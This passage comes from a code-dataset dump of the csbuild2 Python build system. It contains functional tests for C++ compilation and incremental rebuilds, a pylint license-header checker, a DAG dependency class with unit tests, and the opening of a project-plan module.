b\"!\"))\n\n\tdef testCompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles\"\"\"\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=libhello\", \"--show-commands\")\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n\n\t\t# Verify a successive compile succeeds.\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\n\[email protected](platform.system() == \"Linux\", \"Clang test is only supported on Linux\")\n\tdef testClangCompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles with the clang toolchain\"\"\"\n\t\tself.cleanArgs = [\"--project=libhello\", \"--project=hello_world\", \"--toolchain=clang\"]\n\n\t\tself.assertMakeSucceeds(\"-v\", \"--toolchain=clang\", \"--project=libhello\", \"--show-commands\")\n\t\tself.assertMakeSucceeds(\"-v\", \"--toolchain=clang\", \"--project=hello_world\", \"--show-commands\")\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n\n\tdef testLibraryFail(self):\n\t\t\"\"\"Test that invalid libraries cause a failure\"\"\"\n\t\tself.cleanArgs = [\"--project=fail_libraries\"]\n\t\tself.assertMakeRaises(LibraryError, \"-v\", \"--project=fail_libraries\", \"--show-commands\")\n\n\tdef testRecompileDoesntCompileOrLinkAnything(self):\n\t\t\"\"\"Test that recompiling without any changes doesn't do anything\"\"\"\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=libhello\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling libhello/libhello.cpp\", out)\n\t\tself.assertIn(\"Linking libhello\", out)\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertNotIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertNotIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertNotIn(\"Linking hello_world\", out)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n\n\tdef testRecompileAfterTouchRebuildsOnlyOneFile(self):\n\t\t\"\"\"Test that recompiling after touching one file builds only that file\"\"\"\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=libhello\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling libhello/libhello.cpp\", out)\n\t\tself.assertIn(\"Linking libhello\", out)\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\tTouch(\"hello_world/hello.cpp\")\n\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertNotIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n\n\t\tTouch(\"hello_world/main.cpp\")\n\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertNotIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n\n\tdef testRecompileAfterTouchingHeaderRebuildsBothFiles(self):\n\t\t\"\"\"Test that recompiling after touching a header causes all cpp files that include it to recompile\"\"\"\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=libhello\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling libhello/libhello.cpp\", out)\n\t\tself.assertIn(\"Linking libhello\", out)\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\tTouch(\"hello_world/header.hpp\")\n\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n\n\tdef testRecompileAfterChangingLibraryRelinksExecutable(self):\n\t\t\"\"\"Test that recompiling after touching a library file causes the downstream executable to relink\"\"\"\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling libhello/libhello.cpp\", out)\n\t\tself.assertIn(\"Linking libhello\", out)\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\twith open(\"libhello/libhello.cpp\", \"rb\") as f:\n\t\t\tdata = f.read()\n\t\twith open(\"libhello/libhello.cpp\", \"wb\") as f:\n\t\t\tf.write(data.replace(b\"!\", b\"!!!\"))\n\n\t\ttry:\n\t\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\t\tself.assertIn(\"Compiling libhello/libhello.cpp\", out)\n\t\t\tself.assertIn(\"Linking libhello\", out)\n\t\t\tself.assertNotIn(\"Compiling hello_world/hello.cpp\", out)\n\t\t\tself.assertNotIn(\"Compiling hello_world/main.cpp\", out)\n\t\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\t\tout = subprocess.check_output([self.outputFile])\n\n\t\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!!!\"))\n\t\tfinally:\n\t\t\twith open(\"libhello/libhello.cpp\", \"wb\") as f:\n\t\t\t\tf.write(data)\n\n\tdef testCompileFail(self):\n\t\t\"\"\"Test a compile failure\"\"\"\n\t\tself.cleanArgs = [\"--project=fail_compile\"]\n\t\tself.assertMakeFails(\n\t\t\tR\"ERROR: Build for fail_compile/main\\.cpp in project fail_compile \\(.*\\) failed!\",\n\t\t\t\"-v\",\n\t\t\t\"--project=fail_compile\",\n\t\t\t\"--show-commands\"\n\t\t)\n\n\tdef testLinkFail(self):\n\t\t\"\"\"Test a link failure\"\"\"\n\t\tself.cleanArgs = [\"--project=fail_link\"]\n\t\tself.assertMakeFails(\n\t\t\tR\"ERROR: Build for \\{.*static/fail_link/.*/main\\.(.+)\\} in project fail_link \\(.*\\) failed!\",\n\t\t\t\"-v\",\n\t\t\t\"--project=fail_link\",\n\t\t\t\"--show-commands\"\n\t\t)\n\nclass BasicCppTestSharedLibs(FunctionalTest):\n\t\"\"\"Basic c++ test\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.outputFile = \"shared/hello_world.exe\"\n\t\telse:\n\t\t\tself.outputFile = \"shared/hello_world\"\n\t\toutDir = \"shared\"\n\t\tFunctionalTest.setUp(self, outDir=outDir, cleanArgs=[\"--project=hello_world\", \"--project=libhello\", \"--target=shared\"])\n\n\tdef testAbsPathSharedLibs(self):\n\t\t\"\"\"Test that shared libs specified with absolute paths build successfully\"\"\"\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=libhello\", \"--show-commands\", \"--target=shared\")\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\", \"--target=shared\")\n\t\tself.cleanArgs = [\"--project=libhello\", \"--project=hello_world\", \"--target=shared\"]\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n" }, { "alpha_fraction": 0.7233306169509888, "alphanum_fraction": 0.7296416759490967, "avg_line_length": 35.38518524169922, "blob_id": "25627a0da96d0c37ca6d684878283e5e747a8964", "content_id": "7c72874d07533d72c18ba8fa95d66bad9dc3a67b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4912, "license_type": "permissive", "max_line_length": 97, "num_lines": 135, "path": "/csbuild/_testing/pylint_license_check.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: pylint_license_check\n\t:synopsis: Pylint custom checker to check for licensing issues and general always-required stuff\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport re\nimport sys\n\nif sys.version_info.major >= 3:\n\tfrom pylint.interfaces import IRawChecker\n\tfrom pylint.checkers import BaseChecker\n\nelse:\n\tclass IRawChecker(object):\n\t\t# pylint: disable=missing-class-docstring\n\t\tpass\n\n\tclass BaseChecker(object):\n\t\t# pylint: disable=missing-class-docstring\n\t\tpass\n\nMANDATORY_COPYRIGHT_HEADER = R\"\"\"^(# -\\*- coding: utf-8 -\\*-\n\n)?# Copyright \\(C\\) 201\\d [^\\n]+\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files \\(the \"Software\"\\),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software\\.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT\\. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE\\.\"\"\".replace(\"\\r\", \"\")\n\nFUTURE_IMPORT_REQ = \"from __future__ import unicode_literals, division, print_function\"\n\nclass HeaderCheck(BaseChecker):\n\t\"\"\"check for line continuations with '\\' instead of using triple\n\tquoted string or parenthesis\n\t\"\"\"\n\n\t# pylint: disable=invalid-name\n\n\t__implements__ = IRawChecker\n\n\tname = 'csbuild_license_check'\n\tmsgs = {\n\t\t'E9901': (\n\t\t\t'Missing license header',\n\t\t\t'missing-license-header',\n\t\t\t'missing-license-header'\n\t\t),\n\t\t'E9902': (\n\t\t\t'All files must import unicode_literals, division, and print_function from __future__',\n\t\t\t'missing-future-imports',\n\t\t\t'missing-future-imports'\n\t\t),\n\t\t'E9903': (\n\t\t\t'All modules must include a docstring containing .. module:: <module_name>',\n\t\t\t'module-name-missing-in-docstring',\n\t\t\t'module-name-missing-in-docstring'\n\t\t),\n\t\t'E9904': (\n\t\t\t'__init__.py in a package must include a docstring containing .. package:: <package_name>',\n\t\t\t'package-name-missing-in-docstring',\n\t\t\t'package-name-missing-in-docstring'\n\t\t)\n\t}\n\toptions = ()\n\n\tdef process_module(self, module):\n\t\t\"\"\"\n\t\tProcess a module the module's content is accessible via node.stream() function.\n\n\t\t:param module: Module being processed.\n\t\t:type module: :class:`astroid.scoped_nodes.Module`\n\t\t\"\"\"\n\t\twith module.stream() as stream:\n\t\t\ttxt = b\"\".join(stream).decode(\"UTF-8\")\n\n\t\t\ttxt = txt.replace(\"\\r\", \"\")\n\n\t\t\tif not re.match(MANDATORY_COPYRIGHT_HEADER, txt):\n\t\t\t\tself.add_message('missing-license-header', line=0)\n\t\t\tif FUTURE_IMPORT_REQ not in txt:\n\t\t\t\tself.add_message('missing-future-imports', line=0)\n\n\t\t\tpackage = os.path.basename(os.path.dirname(module.file))\n\t\t\tmoduleName = os.path.basename(module.file)\n\t\t\tmoduleName = os.path.splitext(moduleName)[0]\n\t\t\tif moduleName == \"__init__\":\n\t\t\t\tif \".. package:: {}\".format(package) not in txt:\n\t\t\t\t\tself.add_message('package-name-missing-in-docstring', line=0)\n\t\t\telif \".. module:: {}\".format(moduleName) not in txt:\n\t\t\t\tself.add_message('module-name-missing-in-docstring', line=0)\n\n\n\ndef register(linter): # pylint: disable=invalid-name\n\t\"\"\"required method to auto register this checker\"\"\"\n\tlinter.register_checker(HeaderCheck(linter))\n" }, { "alpha_fraction": 0.6668647527694702, "alphanum_fraction": 0.6825113892555237, "avg_line_length": 28.354650497436523, "blob_id": "559dd9712697555b4f2cab101836dde80c9c6de8", "content_id": "3c2454f01cebc30107179e85aaec0aabb92e7432", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5049, "license_type": "no_license", "max_line_length": 165, "num_lines": 172, "path": "/csbuild/_utils/dag.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: dag\n\t:synopsis: class representing a directed acyclic graph\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\n\nfrom collections import OrderedDict\nfrom .._testing import testcase\n\nclass DAG(object):\n\t\"\"\"\n\tDirected acyclic graph class.\n\n\t:param keyFunc: Function to resolve an inserted object into a key. If not specified, the object itself is used.\n\t:type keyFunc: Callable\n\t\"\"\"\n\tdef __init__(self, keyFunc=None):\n\t\tself._graph = OrderedDict()\n\t\tself._deferred = set()\n\t\tif keyFunc is None:\n\t\t\tkeyFunc = lambda x: x\n\t\tself._keyFunc = keyFunc\n\n\n\tdef Add(self, value, dependencies):\n\t\t\"\"\"\n\t\tAdd an item into the graph\n\n\t\t:param value: The value to add\n\t\t:type value: any\n\t\t:param dependencies: List of keys that must precede this one in the graph\n\t\t:type dependencies: list(any)\n\t\t\"\"\"\n\t\tassert self._keyFunc(value) not in self._graph, \"Duplicate item in dependency graph: {}\".format(self._keyFunc(value))\n\t\tfor dependency in dependencies:\n\t\t\tif dependency not in self._graph:\n\t\t\t\tself._deferred.add((value, tuple(dependencies)))\n\t\t\t\treturn\n\t\tself._graph.update({self._keyFunc(value): value})\n\t\twhile True:\n\t\t\tdeletes = []\n\t\t\tfor (otherValue, otherDependencies) in self._deferred:\n\t\t\t\tfor dependency in otherDependencies:\n\t\t\t\t\tif dependency not in self._graph:\n\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tself._graph.update({self._keyFunc(otherValue):otherValue})\n\t\t\t\t\tdeletes.append((otherValue, otherDependencies))\n\t\t\tif deletes:\n\t\t\t\tfor delete in deletes:\n\t\t\t\t\tself._deferred.remove(delete)\n\t\t\telse:\n\t\t\t\tbreak\n\n\n\tdef Valid(self):\n\t\t\"\"\"\n\t\tCheck if the graph is valid\n\n\t\t:return: True if all dependencies have been resolved and none are circular, else False\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\treturn bool(not self._deferred)\n\n\tdef __bool__(self):\n\t\t\"\"\"\n\t\tCheck if the graph is valid\n\n\t\t:return: True if all dependencies have been resolved and none are circular, else False\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\treturn self.Valid()\n\n\tif sys.version_info[0] < 3:\n\t\t__nonzero__ = __bool__\n\n\tdef __iter__(self):\n\t\t\"\"\"\n\t\tIterate the items in the graph in an acceptable order such that dependencies are resolved before the things that\n\t\tdepend on them.\n\t\t\"\"\"\n\t\tif not self.Valid():\n\t\t\traise ValueError(\"Could not generate directed acyclic graph - unresolvable dependencies found in items: {}\".format([self._keyFunc(x) for x, _ in self._deferred]))\n\t\tfor val in self._graph.values():\n\t\t\tyield val\n\n\tdef __len__(self):\n\t\treturn len(self._graph) + len(self._deferred)\n\nclass TestDAG(testcase.TestCase):\n\t\"\"\"Test the DAG\"\"\"\n\t# pylint: disable=invalid-name\n\n\tdef testDAG(self):\n\t\t\"\"\"Basic test - this should work\"\"\"\n\t\tdag = DAG()\n\t\tdag.Add(1, [2, 3, 4, 5])\n\t\tdag.Add(3, [4, 5])\n\t\tdag.Add(5, [])\n\t\tdag.Add(2, [3, 4, 5])\n\t\tdag.Add(4, [5])\n\t\tself.assertEqual(5, len(dag))\n\t\tl = list(dag)\n\t\tself.assertEqual(l, [5,4,3,2,1])\n\n\tdef testCircularDependency(self):\n\t\t\"\"\"Circular dependency test, should fail\"\"\"\n\t\tdag = DAG()\n\t\tdag.Add(1, [2, 3, 4, 5])\n\t\tdag.Add(3, [4, 5])\n\t\tdag.Add(5, [1])\n\t\tdag.Add(2, [3, 4, 5])\n\t\tdag.Add(4, [5])\n\t\tself.assertFalse(dag.Valid())\n\t\tself.assertFalse(dag)\n\t\tself.assertEqual(5, len(dag))\n\t\twith self.assertRaises(ValueError):\n\t\t\t_ = list(dag)\n\n\tdef testMissingDependency(self):\n\t\t\"\"\"Missing dependency test, should fail\"\"\"\n\t\tdag = DAG()\n\t\tdag.Add(1, [2, 3, 4, 5])\n\t\tdag.Add(3, [4, 5])\n\t\tdag.Add(5, [])\n\t\tdag.Add(2, [3, 4, 5])\n\t\tself.assertFalse(dag.Valid())\n\t\tself.assertFalse(dag)\n\t\tself.assertEqual(4, len(dag))\n\t\twith self.assertRaises(ValueError):\n\t\t\t_ = list(dag)\n\n\tdef testKeyFunc(self):\n\t\t\"\"\"Test that the dag still works with a key function provided\"\"\"\n\t\tclass _intWrap(object):\n\t\t\tdef __init__(self, val):\n\t\t\t\tself.val = val\n\n\t\tdag = DAG(lambda a: a.val)\n\t\tdag.Add(_intWrap(1), [2, 3, 4, 5])\n\t\tdag.Add(_intWrap(3), [4, 5])\n\t\tdag.Add(_intWrap(5), [])\n\t\tdag.Add(_intWrap(2), [3, 4, 5])\n\t\tdag.Add(_intWrap(4), [5])\n\t\tself.assertEqual(5, len(dag))\n\t\tl = list(dag)\n\t\tself.assertEqual([a.val for a in l], [5,4,3,2,1])\n" }, { "alpha_fraction": 0.6965101957321167, "alphanum_fraction": 0.7094470858573914, "avg_line_length": 34.95071792602539, "blob_id": "198d09370fc516930aa544e76693ec7d80a25339", "content_id": "a97ad1d3680e0ea0e5a37c4c928f33a8fbbeaa67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35016, "license_type": "no_license", "max_line_length": 182, "num_lines": 974, "path": "/csbuild/_build/project_plan.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: project_plan\n\t:synopsis: Contains non-finalized settings for building a project.\n\t\tThis class is amalgamated with all possible settings this project can have, with all possible\n\t\ttoolchain, architecture, and platform combinations. This plan will be executed per toolchain and architecture\n\t\tto create a concrete Project\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport platform\nimport copy\nimport sys\n\nimport collections\n\nimport csbuild\nfrom . import project\nfrom .. import log, perf_timer\nfrom .._utils import ordered_set, MultiBreak\nfrom .._utils.decorators import TypeChecked\nfrom .._utils.string_abc import String\nfrom .._testing import testcase\nfrom ..toolchain import toolchain\n\nif sys.version_info[0] >= 3:\n\tfrom collections.abc import Callable\nelse:\n\tfrom collections import Callable\n\nallPlans = {}\nclass _defaultType(object):\n\tdef __repr__(self):\n\t\treturn \"<default>\"\n\nuseDefault = _defaultType()\n\ndef _getDefaultToolchain():\n\tdefaultToolchain = {\n\t\t\"Windows\": \"msvc\",\n\t\t\"Darwin\": \"clang\",\n\t}\n\t# Get the default toolchain or \"gcc\" as a default when the current\n\t# platform does not have a specific toolchain in the map.\n\treturn defaultToolchain.get(platform.system(), \"gcc\")\n\nclass ProjectPlan(object):\n\t\"\"\"\n\tA plan to create one or more finalized projects.\n\n\t:param name: The project's name. Must be unique.\n\t:type name: str, bytes\n\t:param workingDirectory: The location on disk containing the project's files, which should be examined to collect source files.\n\t\tIf autoDiscoverSourceFiles is False, this parameter is ignored.\n\t:type workingDirectory: str, bytes\n\t:param depends: List of names of other prjects this one depends on.\n\t:type depends: list(str, bytes)\n\t:param priority: Priority in the build queue, used to cause this project to get built first in its dependency ordering. Higher number means higher priority.\n\t:type priority: int\n\t:param ignoreDependencyOrdering: Treat priority as a global value and use priority to raise this project above, or lower it below, the dependency order\n\t:type ignoreDependencyOrdering: bool\n\t:param autoDiscoverSourceFiles: If False, do not automatically search the working directory for files, but instead only build files that are manually added.\n\t:type autoDiscoverSourceFiles: bool\n\t:param autoResolveRpaths: If True, automatically add RPATH arguments for linked shared libraries.\n\t:type autoResolveRpaths: bool\n\t:param scriptDir: Directory of the script where this project is defined\n\t:type scriptDir: str, bytes\n\t\"\"\"\n\t@TypeChecked(name=String, workingDirectory=String, depends=list, priority=int, ignoreDependencyOrdering=bool, autoDiscoverSourceFiles=bool, autoResolveRpaths=bool, scriptDir=String)\n\tdef __init__(self, name, workingDirectory, depends, priority, ignoreDependencyOrdering, autoDiscoverSourceFiles, autoResolveRpaths, scriptDir):\n\t\tassert name not in allPlans, \"Duplicate project name: {}\".format(name)\n\t\tself._name = name\n\t\tself._workingDirectory = workingDirectory\n\t\tself._depends = depends\n\t\tself._priority = priority\n\t\tself._ignoreDependencyOrdering = ignoreDependencyOrdering\n\t\tself._autoDiscoverSourceFiles = autoDiscoverSourceFiles\n\t\tself._autoResolveRpaths = autoResolveRpaths\n\t\tself._scriptDir = scriptDir\n\n\t\tif csbuild.currentPlan is not None:\n\t\t\t# pylint: disable=protected-access\n\t\t\tself._settings = copy.deepcopy(csbuild.currentPlan._settings)\n\t\t\tself.defaultTarget = csbuild.currentPlan.defaultTarget\n\t\t\tself.defaultToolchain = csbuild.currentPlan.defaultToolchain\n\t\t\tself.defaultArchitecture = csbuild.currentPlan.defaultArchitecture\n\t\t\tself.defaultArchitectureMap = copy.deepcopy(csbuild.currentPlan.defaultArchitectureMap)\n\n\t\t\tself.selfLimits = copy.deepcopy(csbuild.currentPlan.childLimits)\n\t\t\tself.childLimits = copy.deepcopy(csbuild.currentPlan.childLimits)\n\t\t\tself.knownTargets = set(csbuild.currentPlan.childTargets)\n\t\t\tself.childTargets = set(self.knownTargets)\n\t\telse:\n\t\t\tself._settings = {}\n\t\t\tself.defaultTarget = \"release\"\n\t\t\tself.defaultToolchain = _getDefaultToolchain()\n\t\t\tself.defaultArchitecture = useDefault\n\t\t\tself.defaultArchitectureMap = {}\n\n\t\t\tself.selfLimits = {\n\t\t\t\t\"toolchain\" : set(),\n\t\t\t\t\"target\" : set(),\n\t\t\t\t\"architecture\" : set(),\n\t\t\t\t\"platform\" : set()\n\t\t\t}\n\t\t\tself.childLimits = copy.deepcopy(self.selfLimits)\n\t\t\tself.knownTargets = set()\n\t\t\tself.childTargets = set()\n\n\t\tself.oldChildLimits = []\n\n\t\tself._workingSettingsStack = [[self._settings]]\n\t\tself._currentSettingsDicts = self._workingSettingsStack[0]\n\t\tallPlans[name] = self\n\n\t@property\n\tdef name(self):\n\t\t\"\"\"\n\t\tGet the project name\n\t\t:return: project name\n\t\t:rtype: str, bytes\n\t\t\"\"\"\n\t\treturn self._name\n\n\t@property\n\tdef depends(self):\n\t\t\"\"\"\n\t\tGet the project dependency list\n\t\t:return: project dependency list\n\t\t:rtype: list\n\t\t\"\"\"\n\t\treturn self._depends\n\n\t_validContextTypes = {\"toolchain\", \"architecture\", \"platform\", \"target\", \"scope\"}\n\n\tdef EnterContext(self, *contextTypes):\n\t\t\"\"\"\n\t\tEnter a context for storing settings overrides.\n\t\t:param contextTypes: list of iterables of (contextType, (list, of, context, names))\n\t\t:type contextTypes: tuple[str, tuple[*str]]\n\t\t\"\"\"\n\t\tnewSettingsDicts = []\n\t\tself.oldChildLimits.append(copy.deepcopy(self.childLimits))\n\t\tfor contextType, names in contextTypes:\n\t\t\tassert contextType in ProjectPlan._validContextTypes, \"Invalid context type!\"\n\n\t\t\tlimits = self.childLimits.get(contextType, None)\n\t\t\tif limits:\n\t\t\t\tlimits.intersection_update(names)\n\t\t\telif limits is not None:\n\t\t\t\tlimits.update(names)\n\n\t\t\tfor name in names:\n\t\t\t\tfor settings in self._currentSettingsDicts:\n\t\t\t\t\tnewSettingsDicts.append(settings.setdefault(\"overrides\", {}).setdefault(contextType, {}).setdefault(name, {}))\n\t\tself._currentSettingsDicts = newSettingsDicts\n\t\tself._workingSettingsStack.append(self._currentSettingsDicts)\n\n\tdef LeaveContext(self):\n\t\t\"\"\"Leave the context and return to the previous one\"\"\"\n\t\tself._workingSettingsStack.pop()\n\t\tself._currentSettingsDicts = self._workingSettingsStack[-1]\n\t\tself.childLimits = self.oldChildLimits[-1]\n\t\tself.oldChildLimits.pop()\n\n\tdef _absorbSettings(self, settings, overrideDict, toolchainName, architectureName, targetName, scopeType, inScope):\n\t\tif overrideDict is None:\n\t\t\treturn\n\n\t\tif not scopeType or inScope:\n\t\t\tfor key, val in overrideDict.items():\n\t\t\t\tif key == 